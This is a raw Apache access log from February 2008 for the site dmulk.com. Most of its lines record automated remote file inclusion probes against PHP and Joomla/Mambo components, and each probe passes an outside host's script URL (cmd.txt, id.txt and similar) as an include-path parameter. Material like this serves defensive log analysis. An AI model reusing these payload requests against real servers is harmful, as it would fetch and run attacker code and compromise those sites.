64.118.85.129 - - [25/Feb/2008:10:03:56 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.117.237.134 - - [25/Feb/2008:10:04:01 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.zuuniimedee.mn//modules/My_eGallery/data/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:10:04:35 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:10:05:06 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.50.10.15 - - [25/Feb/2008:10:05:10 -0800] "GET /logs/access_080108.log/PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.10.15 - - [25/Feb/2008:10:05:10 -0800] "GET /PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.10.15 - - [25/Feb/2008:10:05:10 -0800] "GET /logs/PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:10:05:25 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.103.76 - - [25/Feb/2008:10:05:29 -0800] "GET /index.php?option=com_directory&page=viewcat&catid=&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:10:05:31 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:10:05:32 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:05:34 -0800] "GET /logs/access_080201.log/index.php?mosConfig_absolute_path=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:05:35 -0800] "GET /index.php?mosConfig_absolute_path=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:05:35 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:05:37 -0800] "GET /logs/access_080131.log//modules/My_eGallery/index.php?basepath=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:10:05:39 -0800] "GET /logs/access_080108.log/PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:10:05:39 -0800] "GET /PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:10:05:40 -0800] "GET /logs/PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:05:41 -0800] "GET /logs/access_080105.log/index.php?mosConfig_absolute_path=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:10:05:45 -0800] "GET /logs/access_080108.log/PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:10:05:46 -0800] "GET /PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:10:05:46 -0800] "GET /logs/PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.95.238.2 - - [25/Feb/2008:10:05:54 -0800] "GET /robots.txt HTTP/1.0" 404 275 "http://majestic12.co.uk/bot.php?I=7C1495581893537156B653D51EC47C9A-D0F3149E81B90348-D03326128533B650-www.dmulk.com" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
82.95.238.2 - - [25/Feb/2008:10:05:55 -0800] "GET /presto HTTP/1.0" 301 75 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
82.95.238.2 - - [25/Feb/2008:10:05:56 -0800] "GET /presto/ HTTP/1.0" 200 510 "http://www.dmulk.com/presto" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:10:06:03 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:10:06:04 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:10:06:04 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:10:06:32 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:10:06:37 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:10:06:44 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.154.42 - - [25/Feb/2008:10:07:39 -0800] "GET /logs/access.log/newspublish/include.php?path[docroot]=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.18.154.42 - - [25/Feb/2008:10:07:39 -0800] "GET /newspublish/include.php?path[docroot]=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.18.154.42 - - [25/Feb/2008:10:07:39 -0800] "GET /logs/newspublish/include.php?path[docroot]=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:10:07:49 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:10:07:49 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:10:07:49 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.136.250.22 - - [25/Feb/2008:10:08:02 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:10:08:09 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:10:08:09 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:10:08:09 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:08:23 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.191.36.35 - - [25/Feb/2008:10:08:23 -0800] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://svchost25.site.voila.fr/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.36.35 - - [25/Feb/2008:10:08:24 -0800] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://svchost25.site.voila.fr/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.36.35 - - [25/Feb/2008:10:08:24 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://svchost25.site.voila.fr/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:10:08:57 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:10:08:57 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:10:08:57 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.170.75.8 - - [25/Feb/2008:10:09:08 -0800] "GET /logs/access_080108.log/PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.170.75.8 - - [25/Feb/2008:10:09:09 -0800] "GET /PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.170.75.8 - - [25/Feb/2008:10:09:09 -0800] "GET /logs/PHPDJ_v05/dj/djpage.php?page=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.148.20.146 - - [25/Feb/2008:10:09:18 -0800] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:10:42 -0800] "GET /logs/access_080201.log/?mosConfig_live_site=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:10:43 -0800] "GET /?mosConfig_live_site=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 200 3094 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:10:43 -0800] "GET /logs/?mosConfig_live_site=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 200 36116 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:10:11:29 -0800] "GET /logs//administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:10:11:29 -0800] "GET //administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:10:11:36 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:10:11:36 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:10:11:36 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:12:00 -0800] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:12:00 -0800] "GET //modules/My_eGallery/index.php?basepath=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.79.163.220 - - [25/Feb/2008:10:12:00 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [25/Feb/2008:10:12:00 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [25/Feb/2008:10:12:00 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.136.6.38 - - [25/Feb/2008:10:12:01 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.perfilamos.com/administrator/components/com_mambots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.79.163.220 - - [25/Feb/2008:10:12:01 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [25/Feb/2008:10:12:01 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [25/Feb/2008:10:12:01 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [25/Feb/2008:10:12:03 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.3 - - [25/Feb/2008:10:12:09 -0800] "GET /logs/access_071220.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.3 - - [25/Feb/2008:10:12:10 -0800] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.3 - - [25/Feb/2008:10:12:10 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.3 - - [25/Feb/2008:10:12:20 -0800] "GET /logs/access_071216.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.geocities.com/kang_crew/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.79.163.220 - - [25/Feb/2008:10:12:31 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.142.210.13 - - [25/Feb/2008:10:12:49 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.210.13 - - [25/Feb/2008:10:12:49 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.210.13 - - [25/Feb/2008:10:12:49 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:10:12:54 -0800] "GET /logs/access_080203.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.210.13 - - [25/Feb/2008:10:12:57 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.252.59 - - [25/Feb/2008:10:13:30 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
62.75.252.59 - - [25/Feb/2008:10:13:30 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:10:13:46 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:10:13:50 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
208.70.184.57 - - [25/Feb/2008:10:14:11 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.70.184.57 - - [25/Feb/2008:10:14:12 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:14:12 -0800] "GET /logs/access_080211.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.70.184.57 - - [25/Feb/2008:10:14:12 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:14:12 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.96.89 - - [25/Feb/2008:10:14:12 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:10:14:22 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:10:14:23 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:10:14:29 -0800] "GET /logs/access_080131.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:10:14:29 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:10:14:33 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.222.130.20 - - [25/Feb/2008:10:14:44 -0800] "GET /logs/access_080107.log//starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.130.20 - - [25/Feb/2008:10:14:44 -0800] "GET //starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.82.34.252 - - [25/Feb/2008:10:14:44 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.130.20 - - [25/Feb/2008:10:14:44 -0800] "GET /logs//starnet/modules/sn_forum/index.php?cmsdir=http://wiki.sertes.nl/tiki/styles/slides/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.82.34.252 - - [25/Feb/2008:10:14:44 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.82.34.252 - - [25/Feb/2008:10:14:44 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.112.178 - - [25/Feb/2008:10:15:04 -0800] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.112.178 - - [25/Feb/2008:10:15:06 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.112.178 - - [25/Feb/2008:10:15:10 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.82.34.252 - - [25/Feb/2008:10:15:12 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://scictx.org/advguestbook//img/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.210.13 - - [25/Feb/2008:10:15:18 -0800] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.210.13 - - [25/Feb/2008:10:15:18 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.210.13 - - [25/Feb/2008:10:15:19 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.170.75.8 - - [25/Feb/2008:10:15:26 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.170.75.8 - - [25/Feb/2008:10:15:26 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.170.75.8 - - [25/Feb/2008:10:15:27 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.218.85.18 - - [25/Feb/2008:10:15:33 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
